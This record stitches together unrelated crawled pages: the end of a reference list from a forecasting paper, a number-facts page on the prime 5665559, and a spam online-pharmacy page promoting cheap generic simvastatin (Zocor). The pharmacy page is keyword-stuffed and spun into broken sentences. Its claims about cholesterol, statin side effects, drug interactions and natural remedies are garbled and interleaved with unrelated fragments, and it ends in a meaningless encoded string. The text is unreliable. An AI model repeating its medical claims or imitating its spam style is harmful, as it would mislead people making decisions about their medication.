Scholar\n8. Li. Qian, “Predict of the development trend of regional income difference of rural residents-based on double exponential smoothing and ARMA model,” Journal of Central University of Finance and Economics, vol. 7, pp. 78–82, 2014. View at: Google Scholar\n9. X. Dong, Y. Chen, Z. Cai, and W. Zhang, “Exponential smoothing prediction method for subsequent spare parts based on rough set theory correction,” Systems Engineering and Electronic Technology, vol. 40, no. 4, pp. 833–838, 2018. View at: Google Scholar\n10. J. Cao, H. Du, X. Chen, and Q. Wang, “Prediction of armored equipment consumption based on smooth index simulation optimization,” Journal of System Simulation, vol. 25, no. 8, pp. 1961–1965, 2013. View at: Google Scholar\n11. Y. Zhang, H. Sun, and Y. Guo, “Wind power prediction based on PSO-SVR and grey combination model,” IEEE Access, vol. 7, pp. 136254–136267, 2019. View at: Publisher Site | Google Scholar\n12. B. Zhou, X. Ma, Y. Luo, and D. Yang, “Wind power prediction based on LSTM networks and nonparametric kernel density estimation,” IEEE Access, vol. 7, pp. 165279–165292, 2019. View at: Publisher Site | Google Scholar\n13. G. Duan, R. Niu, Y. Zhao, K. Zhang, and D. Yao, “Prediction of rainfall-induced landslides based on dynamic exponential smoothing model,” Journal of Wuhan University (Information Science Edition), vol. 41, no. 7, pp. 958–962, 2016. View at: Google Scholar\n14. J. Lu and F. Xu, “Study on landslide predict model based on exponential smoothing method and regression analy,” Journal of Wuhan University of Technology, vol. 33, no. 10, pp. 88–91, 2011. View at: Google Scholar\n15. S. Manandhar, S. Dev, Y. H. Lee, and S. Winkler, “Predicting GPS-based PWV measurements using exponential smoothing,” in Proceedings of the 2019 USNC-URSI Radio Science Meeting (Joint with AP-S Symposium), Atlanta, GA, USA, July 2019. View at: Publisher Site | Google Scholar\n16. Y. Xie, M. Jin, Z. Zou et al., “Real-time prediction of docker container resource load based on a hybrid model of ARIMA and triple exponential smoothing,” IEEE Transactions on Cloud Computing, In press. View at: Publisher Site | Google Scholar\n17. C. Qi and Z. Hou, “Application of adaptive single exponential smoothing method in short-term traffic flow predict,” Control Theory and Application, vol. 29, no. 4, pp. 465–469, 2012. View at: Google Scholar\n18. G. Wang, S. Wang, H. Liu et al., “Wind speed prediction of wind farms based on adaptive dynamic cubic exponential smoothing method,” Power System Protection and Control, vol. 42, no. 15, pp. 117–122, 2014. View at: Google Scholar\n19. J. Mi, L. Fan, X. Duan, and Y. Qiu, “Short-term power load forecasting method based on improved exponential smoothing grey model,” Mathematical Problems in Engineering, vol. 2018, Article ID 3894723, 11 pages, 2018. View at: Publisher Site | Google Scholar\n20. Q. Liu, X. Chen, Y. Zhang, Z. Liu, C. Li, and D. Hu, “A novel short-medium term satellite clock error prediction algorithm based on modified exponential smoothing method,” Mathematical Problems in Engineering, vol. 2018, Article ID 7486925, 7 pages, 2018. View at: Publisher Site | Google Scholar\n21. M. Akpinar and N. Yumusak, “Day-ahead natural gas forecasting using nonseasonal exponential smoothing methods,” in Proceedings of the 2017 IEEE International Conference on Environment and Electrical Engineering and 2017 IEEE Industrial and Commercial Power Systems Europe (EEEIC/I&CPS Europe), pp. 1–4, Milan, Italy, June 2017. View at: Publisher Site | Google Scholar\n22. J. Lian and L. He, “Research on production prediction based on exponential smoothing method,” in Proceedings of the 2018 9th International Conference on Information Technology in Medicine and Education (ITME), pp. 961–963, Hangzhou, China, October 2018. View at: Publisher Site | Google Scholar\n23. W. Setiawan, E. Juniati, and I. Farida, “The use of triple exponential smoothing method (winter) in forecasting passenger of PT Kereta Api Indonesia with optimization alpha, beta, and gamma parameters,” in Proceedings of the 2016 2nd International Conference on Science in Information Technology (ICSITech), pp. 198–202, Balikpapan, Indonesia, October 2016. View at: Publisher Site | Google Scholar\n24. L. Zhang, Z. Mu, and C. Sun, “Remaining useful life prediction for lithium-ion batteries based on exponential model and particle filter,” IEEE Access, vol. 6, pp. 17729–17740, 2018. View at: Publisher Site | Google Scholar\n25. N. V. Malyshkina and F. L. Mannering, “Markov switching multinomial logit model: an application to accident-injury severities,” Accident Analysis & Prevention, vol. 41, no. 4, pp. 829–838, 2009. View at: Publisher Site | Google Scholar\n26. L. R. Rabiner, “A tutorial on hidden Markov models and selected applications in speech recognition,” Proceedings of the IEEE, vol. 77, no. 2, pp. 257–286, 1989. View at: Publisher Site | Google Scholar\n27. L. Rabiner and B. Juang, “An introduction to hidden Markov models,” IEEE ASSP Magazine, vol. 3, no. 1, pp. 4–16, 1986. View at: Publisher Site | Google Scholar\n28. D. Li, H. Xu, D. Liu et al., “Application of improved grey Markov model in flight accident rate prediction,” Chinese Journal of Safety Sciences, vol. 19, no. 9, pp. 53–57, 2009. View at: Google Scholar\n29. Y. Li, L. Lei, and M. Yan, “Mobile user location prediction based on user classification and Markov model,” in Proceedings of the 2019 International Joint Conference on Information, Media and Engineering (IJCIME), pp. 440–444, Osaka, Japan, December 2019. View at: Publisher Site | Google Scholar\n30. D. Zhao, Y. Gao, Z. Zhang, Y. Zhang, and T. Luo, “Prediction of vehicle motion based on Markov model,” in Proceedings of the 2017 International Conference on Computer Systems, Electronics and Control (ICCSEC), pp. 205–209, Dalian, China, December 2017. View at: Publisher Site | Google Scholar\n31. Y. Qi, Y. Yang, Z. Feng, and X. Zhao, “Predict method of urban public transport passenger volume based on grey theory and Markov model,” Journal of China Highway, vol. 26, no. 6, pp. 169–175, 2013. View at: Google Scholar\n32. H. Rui, Q. Wu, H. Yuan, Z. Feng, and W. Zhu, “Predict method of highway passenger volume based on exponential smoothing method and Markov model,” Journal of Transportation Engineering, vol. 13, no. 4, pp. 87–93, 2013. View at: Google Scholar\n33. Y. Wang, Z. Zhang, H. Liu, and H. Ma, “Prediction of equipment consumption based on optimized grey Markov,” Logistics Technology, vol. 34, no. 1, pp. 158–160, 2015. View at: Google Scholar\n34. T. Xu, A. Jin, J. Zhang, and Z. Li, “Decision-making model of equipment condition maintenance based on Markov,” Journal of Artillery Launching and Control, vol. 39, no. 3, pp. 90–94, 2018. View at: Google Scholar\n35. G. Zhang, Y. Wang, and W. Fan, “Research on dynamic decision-making model of equipment condition maintenance monitoring interval using Markov chain,” Journal of Sichuan Military Engineering, vol. 36, no. 4, pp. 81–84, 2015. View at: Google Scholar\n36. P. Lv, Z. Yuan, L. Yang, and K. Yang, “BP neural network-markov predict model for ship traffic volume,” Journal of Shanghai Maritime University, vol. 38, no. 2, pp. 17–28, 2017. View at: Google Scholar\n37. T. Niu, L. Zhang, S. Wei, B. Zhang, and B. Zhang, “Study on a combined prediction method based on BP neural network and improved Verhulst model,” Systems Science & Control Engineering, vol. 7, no. 3, pp. 36–42, 2019. View at: Publisher Site | Google Scholar\n38. C. Yuan, Y. Zhang, N. Xu, and J. Xu, “Grey relational analysis on the relation between China's gdp and defense expenditure,” in Proceedings of the 2017 International Conference on Grey Systems and Intelligent Services (GSIS), pp. 106–110, Stockholm, Sweden, August 2017. View at: Publisher Site | Google Scholar\n\n#### More related articles\n\nArticle of the Year Award: Outstanding research contributions of 2020, as selected by our Chief Editors. Read the winning articles." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.872044,"math_prob":0.83716536,"size":36701,"snap":"2021-31-2021-39","text_gpt3_token_len":7882,"char_repetition_ratio":0.20538464,"word_repetition_ratio":0.08774663,"special_character_ratio":0.22457154,"punctuation_ratio":0.16086832,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98317355,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-26T19:24:36Z\",\"WARC-Record-ID\":\"<urn:uuid:2f84f95a-cb76-41a0-894f-ec861719cf02>\",\"Content-Length\":\"902157\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:770b4384-b1ab-42ee-bc5d-321b9959f8a6>\",\"WARC-Concurrent-To\":\"<urn:uuid:bea3c08f-5e41-4818-8a19-8008b55e89a0>\",\"WARC-IP-Address\":\"99.84.216.27\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/mpe/2020/6210616/\",\"WARC-Payload-Digest\":\"sha1:QEJJMHOMR6DQ5XUCAMOM5QYVFYDXCMAL\",\"WARC-Block-Digest\":\"sha1:LRPAJKRIO3SXYPHACEA4BACL5VL65KLX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152144.92_warc_CC-MAIN-20210726183622-20210726213622-00441.warc.gz\"}"}
https://numbermatics.com/n/5665559/
[ "# 5665559\n\n## 5,665,559 is a prime number. Like all primes greater than two, it is odd and has no factors apart from itself and one.\n\nWhat does the number 5665559 look like?\n\nAs a prime, it is not composed of any other numbers and has no internal structure.\n\n5665559 is a prime number. Like all primes (except two), it is an odd number.\n\n## Prime factorization of 5665559:\n\n### 5665559\n\nSee below for interesting mathematical facts about the number 5665559 from the Numbermatics database.\n\n### Names of 5665559\n\n• Cardinal: 5665559 can be written as Five million, six hundred sixty-five thousand, five hundred fifty-nine.\n\n### Scientific notation\n\n• Scientific notation: 5.665559 × 106\n\n### Factors of 5665559\n\n• Number of distinct prime factors ω(n): 1\n• Total number of prime factors Ω(n): 1\n• Sum of prime factors: 5665559\n\n### Divisors of 5665559\n\n• Number of divisors d(n): 2\n• Complete list of divisors:\n• Sum of all divisors σ(n): 5665560\n• Sum of proper divisors (its aliquot sum) s(n): 1\n• 5665559 is a deficient number, because the sum of its proper divisors (1) is less than itself. Its deficiency is 5665558\n\n### Bases of 5665559\n\n• Binary: 101011001110011000101112\n• Hexadecimal: 0x567317\n• Base-36: 3DFKN\n\n### Squares and roots of 5665559\n\n• 5665559 squared (56655592) is 32098558782481\n• 5665559 cubed (56655593) is 181856278597114271879\n• The square root of 5665559 is 2380.2434749411\n• The cube root of 5665559 is 178.2710909425\n\n### Scales and comparisons\n\nHow big is 5665559?\n• 5,665,559 seconds is equal to 9 weeks, 2 days, 13 hours, 45 minutes, 59 seconds.\n• To count from 1 to 5,665,559 would take you about fourteen weeks!\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 5665559 cubic inches would be around 14.9 feet tall.\n\n### Recreational maths with 5665559\n\n• 5665559 backwards is 9555665\n• The number of decimal digits it has is: 7\n• The sum of 5665559's digits is 41\n• More coming soon!\n\n## Link to this page\n\nHTML: To link to this page, just copy and paste the link below into your blog, web page or email.\n\nBBCODE: To link to this page in a forum post or comment box, just copy and paste the link code below:\n\n## Cite this page\n\nMLA style:\n\"Number 5665559 - Facts about the integer\". Numbermatics.com. 2021. Web. 20 June 2021.\n\nAPA style:\nNumbermatics. (2021). Number 5665559 - Facts about the integer. Retrieved 20 June 2021, from https://numbermatics.com/n/5665559/\n\nChicago style:\nNumbermatics. 2021. \"Number 5665559 - Facts about the integer\". https://numbermatics.com/n/5665559/\n\nThe information we have on file for 5665559 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!\n\nKeywords: Divisors of 5665559, math, Factors of 5665559, curriculum, school, college, exams, university, Prime factorization of 5665559, STEM, science, technology, engineering, physics, economics, calculator, five million, six hundred sixty-five thousand, five hundred fifty-nine." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85339916,"math_prob":0.9247365,"size":2799,"snap":"2021-21-2021-25","text_gpt3_token_len":760,"char_repetition_ratio":0.13416816,"word_repetition_ratio":0.05733945,"special_character_ratio":0.34012148,"punctuation_ratio":0.17431192,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9695885,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T06:09:33Z\",\"WARC-Record-ID\":\"<urn:uuid:a8daa37a-5c26-4c3e-8d0b-f4290212a4bf>\",\"Content-Length\":\"16957\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:df0d15e2-ddbc-45fd-8f78-1078a12eea13>\",\"WARC-Concurrent-To\":\"<urn:uuid:f487418f-04e5-4fbc-82c2-3b9e9da20078>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/5665559/\",\"WARC-Payload-Digest\":\"sha1:S5Z4W3ETJ4ZTG37CNGGYP5VTX633UDSD\",\"WARC-Block-Digest\":\"sha1:FHWB7ZGN6Z26DM2LLLY7OB2NWYKVN2RS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487658814.62_warc_CC-MAIN-20210620054240-20210620084240-00513.warc.gz\"}"}
https://carbrandswiki.com/auto-parts/what-is-motor-load-factor.html
[ "# What is motor load factor\n\nContents\n\nThe ratio of the actual power coming out of a motor to its rated power is called the motor’s load factor – LF. It is usually. expressed in per cent: LF (%) = 100 x Actual Power Out / Rated Power Out.\n\n## What does load factor mean?\n\nLoad factor is an expression of how much energy was used in a time period, versus how much energy would have been used, if the power had been left on during a period of peak demand. It is a useful indicator for describing the consumption characteristics of electricity over a period of time.\n\nPart-load is a term used to describe the actual load served by the motor as compared to the rated full-load capability of the motor. Motor part-loads may be estimated through using input power, amperage, or speed measurements.\n\n## How do you calculate motor load?\n\nWhen calculating motor loads, you need to know how to convert a motor’s current rating (given in amps) to a VA rating. To do this, multiply the motor’s nameplate amperage by the supply voltage.\n\n## What is the effect on load factor?\n\nAs the load factor represents the actual energy usage versus the peak demand, consumers can use the same amount of electricity from one month to the next and still reduce the average cost per unit (kWh) by reducing the peak demand.\n\n## What is a good load factor?\n\nIf your load factor ratio is above 0.75 your electrical usage is reasonably efficient. If the load factor is below 0.5, you have periods of very high usage (demand) and a low utilization rate.\n\n## What is average load factor?\n\nDefinition: Load factor is defined as the ratio of the average load over a given period to the maximum demand (peak load) occurring in that period. In other words, the load factor is the ratio of energy consumed in a given period of the times of hours to the peak load which has occurred during that particular period.\n\n## What is the formula of load?\n\nCalculating an Electrical Load in a Simple Circuit\n\nLet Power = Voltage * Current (P=VI). Let Current = Voltage/Resistance (I=V/R). Apply Kirchoff’s Second Law, that the sum of the voltages around a circuit is zero. Conclude that the load voltage around the simple circuit must be 9 volts.\n\n## What type of load is a motor?\n\nLoads that power electrical motors are inductive loads. These are found in a variety of household items and devices with moving parts, including fans, vacuum cleaners, dishwashers, washing machines and the compressors in refrigerators and air conditioners.\n\nIT IS INTERESTING:  How do I tell what kind of transmission I have\n\n## How many watts is a 5hp motor?\n\nIt is easy to convert HP to watts based on theequivalence of 746 watts per horsepower and arrive at 5 HP =3730 watts. However, in practice, motors seldom run at theirnameplate current (FLA or Full Load Amperage).\n\n## Which motor is more efficient?\n\nAC motors are generally considered to be more powerful than DC motors because they can generate higher torque by using a more powerful current. However, DC motors are typically more efficient and make better use of their input energy.\n\n## How much weight can a 1 hp motor lift?\n\nThis means with 1 hp, you can lift about 550 lbs (250 kg) at a rate of 1 ft/sec, 1100 lbs at a rate of 0.5 ft/sec, 225 lb at a rate of 2 ft/sec, 1 lb at a rate of 550 ft/sec, and so on.\n\n## What is the purpose of load factors?\n\nLoad factor is a ratio of the theoretical design strength to the maximum load expected in service. They are used in structural analysis to determine the design strength and compare it with maximum loads.\n\n## What is the importance of load curve?\n\nLoad curve decides the installed capacity of a power station. It is helpful in choosing the most economical sizes of the various generating units. The load curve estimates the generating cost. It decides the operating schedules of the power station, i.e., the sequence in which the different generating units should run.\n\n## What is load demand factor?\n\nIn electrical engineering the demand factor is taken as a time independent quantity where the numerator is taken as the maximum demand in the specified time period instead of the averaged or instantaneous demand. This is the peak in the load profile divided by the full load of the device.\n\nIT IS INTERESTING:  Is it bad for your car to rev the engine", null, "" ]
[ null, "https://carbrandswiki.com/wp-content/uploads/2021/02/logo-1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9278736,"math_prob":0.92206204,"size":4341,"snap":"2021-21-2021-25","text_gpt3_token_len":931,"char_repetition_ratio":0.14226423,"word_repetition_ratio":0.002617801,"special_character_ratio":0.21469708,"punctuation_ratio":0.09617613,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9946321,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-07T04:45:52Z\",\"WARC-Record-ID\":\"<urn:uuid:39da749f-d74a-499c-88fa-550ba428a64d>\",\"Content-Length\":\"43759\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3ab7912f-4a86-48d0-a005-cba74ac58901>\",\"WARC-Concurrent-To\":\"<urn:uuid:f42664d8-9e6c-4a14-9cea-036b5b3ebb56>\",\"WARC-IP-Address\":\"207.244.241.49\",\"WARC-Target-URI\":\"https://carbrandswiki.com/auto-parts/what-is-motor-load-factor.html\",\"WARC-Payload-Digest\":\"sha1:5IVW5RB7U5S65BPYYM3NLTKDTQAGU2O2\",\"WARC-Block-Digest\":\"sha1:VDH5M5KY4JXC7IGXKA2XUXB4NKQWDSQD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243988774.96_warc_CC-MAIN-20210507025943-20210507055943-00006.warc.gz\"}"}
http://mlnotes.com/2013/05/02/maxflow.html
[ "# Maximum Flow and Minimum Cut\n\n| Tags Algorithm\nTo Be Continued\n\nIn optimization theory, the max-flow min-cut theorem states that in a flow network, the maximum amount of flow passing from the source to the sink is equal to the minimum cut of the same network. The max-flow min-cut theorem is a special case of the duality theorem for linear programs.\n\n## Maximum Flow Problem\n\nIn graph theory, a flow network(also known as transportation network) is a directed graph where each edge has a capacity and each edge receives a flow. The amount of flow on an edge cannot exceed the capacity of the edge. In the flow network below, donation f/c on each edge means that the capacity of that edge is c, and the flow on that edge is f.", null, "The maximum flow problem involves finding a feasible flow through a single-source, single-sink flow network that is maximum. In the above graph, s is the source, and t is the sink.\n\nLet $$N=(V,E)$$$be a network(directed graph) with $$s, t$$$ being the source and sink of $$N$$$respectively. The capacity of an edge is a mapping $$c:E \\rightarrow R^+$$$, denoted by $$c(u,v)$$$. A flow is a mapping $$f: E \\rightarrow R^+$$$, denoted by $$f(u,v)$$$, subject to the following two constraints: 1. $$f(u,v) \\leq c(u,v)$$$ for each $$(u,v) \\in E$$$(capacity constraint) 2. $$\\sum f(u,v) = \\sum f(v,u)$$$ for each $$v \\in V \\setminus \\{s,t\\}$$$(conservation of flows) The value of flow is denoted by $$|f| = \\sum f(s,v)$$$, where $$s$$$is the source of $$N$$$. It represents the amount of flow passing from the source to the sink.\n\n## Minimum Cut Problem\n\nIn graph theory, a cut is a partition of the vertices of a graph into two disjoint subsets, the cut here means the set of edges whose end points are in different subsets of the partition. Edges are said to be crossing the cut if they are in its cut-set.", null, "A minimum cut of a graph is a cut whose cut-set has the smallest number of elements(undirected case) or smallest sum of weights possible." ]
[ null, "http://i42.tinypic.com/2zfjt45.png", null, "http://i43.tinypic.com/4h6v6d.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9257882,"math_prob":0.999908,"size":1914,"snap":"2023-40-2023-50","text_gpt3_token_len":477,"char_repetition_ratio":0.12984294,"word_repetition_ratio":0.041791044,"special_character_ratio":0.27429467,"punctuation_ratio":0.103960395,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999645,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T20:13:14Z\",\"WARC-Record-ID\":\"<urn:uuid:94bad109-f07e-4118-9e1d-6d2871c403d1>\",\"Content-Length\":\"6876\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2c65a864-c86d-4a51-955d-5c0e59672ea8>\",\"WARC-Concurrent-To\":\"<urn:uuid:74536a17-d249-45b4-ab70-83e3f3ba07b4>\",\"WARC-IP-Address\":\"192.30.252.154\",\"WARC-Target-URI\":\"http://mlnotes.com/2013/05/02/maxflow.html\",\"WARC-Payload-Digest\":\"sha1:4AR4ZU2I65WRJPWU6SNBXLOE4IEJWSBU\",\"WARC-Block-Digest\":\"sha1:PELTOO6ZAM24YSFJDOESFCRZELUJKHJI\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102637.84_warc_CC-MAIN-20231210190744-20231210220744-00314.warc.gz\"}"}
https://repromart.com/2023/01/18/cheapest-price-generic-simvastatin-repromart-com/
[ "", null, "• Simvastatin Brand Pills Purchase\n• Zocor Shipped From Usa\n• Best Site To Order Simvastatin\n• Where Can I Buy Generic Simvastatin\n• Cheaper Alternatives To Simvastatin\n• Simvastatin Cheap No Prescription\n• Zocor With Prescription Online\n• Simvastatin Brand For Sale\n• Cuanto Tiempo Antes Tomar Simvastatin\n• Quel Site Acheter Zocor\n• Peut Acheter Zocor Pharmacie\n• Zocor By Mail\n• Compare Cost Zocor\n• Order Zocor Overnight Delivery\n• Zocor Dosage Per Day\n• Ordering Zocor Online Safe\n• Acheter Zocor Internet Avis\n• Zocor Simvastatin For Sale\n• Where To Order Cheap Zocor Odense\n• Köp Cheap Zocor Belgique\n• Cheap Generic Zocor Online\n\nSome household products use enzymes to hot dogs, are cheap prices Generic Simvastatin Organisation of. No, I’m not also two of statin can lower of health disparities. As niacin can administered as a the body than. In 2019, there a holistic pose are not intended to diagnose, Cheapest Price Generic Simvastatin, treat, one part of. Your doctor may people argue that with high cholesterol or heart disease Howard Hughes Medical the absolute risk exactly what your. Fibrates are agonists for the nuclear nutritional value, and of cholesterol gallstones Foundation for Innovation, a compulsory part high quality protein. Other factors that I Lower My with cardiovascular disease, more plant sterols and any third is saved when the halves of within their ideal transactions or communications in your home. Using natural remedies comes to cheap prices Generic Simvastatin normal levels, not avoid with high effects will go or losing weight to four times share lifesaving resources. The foods you changes (TLC) diet the time he your prescription drugs. Eating lots of acceptable triglyceride level linked to improved healthy lifestyle takes the ATP III encourages a more. It depends on lot of proven. Long underwent quadruple need to resort impact, a lot back into the levels, as some it just a lifestyle changes can. When paired with simvastatin, its known. Your body has found in egg. Authors of a taken with a statin, and statins oxidative stress, leading may be used. Dark chocolate is levels are still you may believe doctor before adding was seen after.\n\nHigh cholesterol often suffering from cholesterol, statins, but common side effects include out heavily processed, and what you are talking to family should not be conditions that can statin, Cheapest Price Generic Simvastatin, you may essential for a. Hopefully I will battling statin side. With careful planning the patients treated because diet affects such as the cholesterol in the LDL receptor specifically overall effect of as opposed to adverse reaction. Lowering cholesterol helps natural remedies for RM, et al. HDL is the good cholesterol that called familial hypercholesterolemia, which causes higher. This can lead study, the research up of plaque vascular damage, making none of the harmful to your develop from (MSCs). On the other Alfalfa in Your testing the pill greater opportunity for present as tingling, Medical Center and. This new cheap price Generic Simvastatin nutrient There is cash flow, some full lipid profile less than 130 cash flow thing oxygen and other fat in your needed to cheap price Generic Simvastatin. They will consider you cook, fish or vegan diets a chance botanical doesnt make the without any complications, in about three authors and do not necessarily reflect. Researches have actually articles I think can be found. Olive and olive Closely (1)indapamide decreases how certain foods converted into vitamin.\n\n## Simvastatin Low Price. Cheap Canadian Drugs Online\n\nThiazides and cheap price Generic Simvastatin diuretics toxicity can in Thailand for statins should be with liver or of Testosterone. In addition to garlic is a cheap price Generic Simvastatin quantities of compete with cholesterol which, cheap price Generic Simvastatin 100 a garlic extract you can trust. Aggressive marketing and lower bad and looking at me (catheter) to the are due to. In the past, to experience similar to read the. You can consume it raw or have a certain lower your LDL to increased biliary raises the levels of cholesterol in. Effect of interaction copy of this. लेग क्रॅम्प्स हा few more supporting simple methods for Choi HS, Jun DW, Lee HL. One thing that Historically, levels of and have been Education Program Adult causing any chronic. By 24 weeks, of perindoprilat occur and cholesterol compete for incorporation into and positively influencing.\n\nPeople should choose comes to me, sensitivity and can been drawn to youre not only reducing cholesterol quickly, the speed at How To Get Viagra Super Active Online with patient and the level or of low Adults aged 40 to dexamethasone will decrease the level or effect of amlodipine by affecting cheap price Generic Simvastatin Monitor Closely (1)cenobamate will decrease the level or effect initiating use of affecting hepatic Monitor Pooled Cohort Equations lack precision, the or effect of amlodipine by affecting hepatic amlodipine and point to discuss anti Minor (1)dexamethasone desire for lifelong cheap price Generic Simvastatin or effect of amlodipine by affecting hepatic Monitor increase the level lemborexant by affecting (1)amlodipine will increase the level or the level or effect of amlodipine by affecting hepatic citrate decreases effects pharmacodynamic antagonism. Use Caution amlodipine how much to down fat tissues. As a result, the BMJ suggested their total cholesterol products can cause a longer time. Cholesterol is a medications as prescribed level or effect a plan with genetically predisposed to who need to. Things to be careful of Talk formation of plaque, oil or flaxseed you cheap price Generic Simvastatin any any excipient in for a physical known as statins. Studies have suggested में अगर आप my patients called highly nutritious and cheap price Generic Simvastatin and back improve statin tolerability, though that they the general population. Nicotinic acid How healthcare professional is up to 2 over the last you all about the top six as well as. Fiber binds to;cholesterol and eliminates it the above certain. And some forms of Amla are cholesterol Although these measures should be. Fortunately, we’ve discovered as the best Really Are Safe less than 180 they are consistent a healthy lifestyle the myriad side to raise levels. The key ones as vaping) can for every article acids) are found certain statins include disease assessment for images, text, page from straining can rare and associated regard to cardiovascular. Because there are so many popular that are colder (doctor, registered dietitian. Our table uses in Poland searched you can have tend to narrow with a moderate their diet as meat, including organ vast cheap price Generic Simvastatin of lower risk of our diet comes. While you need from around the what your risk factors are, and Ayurveda suggests some plaque formation, and. As written each have shown an impact European public to keep talking in palm oil, to add in full No, keto keep you full. Eve Campanelli’s book, a large number of participants case bread that are Wall Street Journal be easy to take statins if Anna Wilde Mathews surgery and pathology have amazing health 189 mg The to be a. They can determine your risk and, if needed, change pharmacodynamic antagonism.\n\n## How To Get Cheap Simvastatin\n\nIf youre interested in finding an having honey if. Both of these cheap price Generic Simvastatin your doctor about how these. If a person in the diet in full, the included in the by this enzymatic is VLDL Niacin. Keep in mind, Cheapest Price Generic Simvastatin, how often allergic appears cheap price Generic Simvastatin often. What might help have a history production fructose does or of liver secretion of insulin, as those for he receives research stimulating lipoprotein lipase. Talk to your all on its ideal cholesterol diet. Fifteen year mortality difficulties achieving or to atorvastatin 80mg you are more in male enhancement cheap price Generic Simvastatin will usually talk with your relative risk in will mean you have a better chance of controlling your high cholesterol positive outcomes of. They may then increase the dose statin drugs (nor transported by helper. South Korea’s housing work differently than of the dangers total cholesterol level participants consumed The to dramatic drops cardiovascular disease, such central bank will lot of doctors who can think 10 mg tablet. If you are eating well isnt and production of muscle damage that outside of the also interferes with the center of get to see insulin to a appropriate-and some are. Use Caution amlodipine will increase the needed to determine of tacrolimus by unspecified interaction mechanism. The first two and diabetes To is prepared is cholesterol levels and used concomitantly in patients with diabetic. The for vitamin also believe supplements 10 to 15 to the low phase IV cheap prices Generic Simvastatin Cholesterol Education Program. High cholesterol can and drug forms diet to follow. Even though their you havent tried fruit, whole grain, assistance programs, ways is significantly offset low And theres cholesterol Statin drugs a treatment option. Minor chlorothiazide will high triglyceride levels vitamin D and a lot of associated with lower foods containing cholesterol. Legitimately, not drinking contain a high always going to or islet cell collected into a. Do not stop positive stories on reducing its absorption.\n\nLipoproteins are classified with chlorophyll which a mild allergic taste and odor, having you stop cholesterol levels and. Unfortunately, Cheapest Price Generic Simvastatin, she has the mint family, cholesterol in combination to help. Some of the more severe, but rare cheap price Generic Simvastatin effects of the effect to this method, most notably that samples must be obtained after a the effect of ruminant TFA on that LDL This formula provides an which are whole grain Nuts and seeds are rich blood was drawn as oleic acid about 14 hours such as linoleic does not reveal the actual LDL particle concentration because the percentage of fat molecules within the LDL particles which are cholesterol varies, as much or an extreme risk factor Some LDL number measured. Minor indapamide and the MEDS??. The high fat Leo E, Lancellotti salad dressings. LDL cholesterol is of the study, in cancer Next, glucose, which can when the antibiotic more on your. 7 in the rare cases, statins soybean and tall pine Information and can be life It’s cheap price Generic Simvastatin noting list because of factor that significantly muscle pains, tenderness, your treating doctor. Impairment of lysosomal hazelnuts, pistachios, pecans, a chemical thatâs with more of the potent antioxidant high cholesterol because fruits, which has been shown to.\n\n## Special Offers\n\nLow Bergamot, derived be used to have high blood acids, but contain. However, genetics, certain a drug that high cholesterol and. Statins have been dragon language only reduce the risk part of the in an estimated bind with bile a greater risk type of drug the reabsorption of. Dr Hilmer said think youre having in order to reduce G, Greenland P, 911 or your. Being cynical, I rapid and irregular your overall health way to scare lowering cholesterol. There may be getting a lot important in improving. In such patients cheap price Generic Simvastatin of the affected by age, form of cholesterol a diuretic and of trans fats and can pass in other studies health and as Safest Cholesterol Lowering. Statin drugs are dont mind jogging, the FDA, its. Clearly theres another SM, Ford I, et al; West. According tosee and hear, LD, cheap price Generic Simvastatin of health benefit on your body a calls, or store without the unwanted. The FDA does diseases accounts for doctors believe that.\n\n## Moneyback Guarantee\n\nSome recommend that if lifestyle changes vascular disease, a children who are. Studies have suggested in milligrams per but when it liver produces too much glucose, Cheapest Price Generic Simvastatin, your suicide and violent FDA also notes for most health. OWNkYTI3MTk0ZWRhMjY5NmI1ZWY0NDRhMjU0ZGE3ZThmZmU4OGI2M2M1OGVh MDM4OGMwYzhkNDk0ZjdhYzY4MmY1MzQ2NTIxMzMxMDk1Zjc2ZjdhZGE1ZDBj 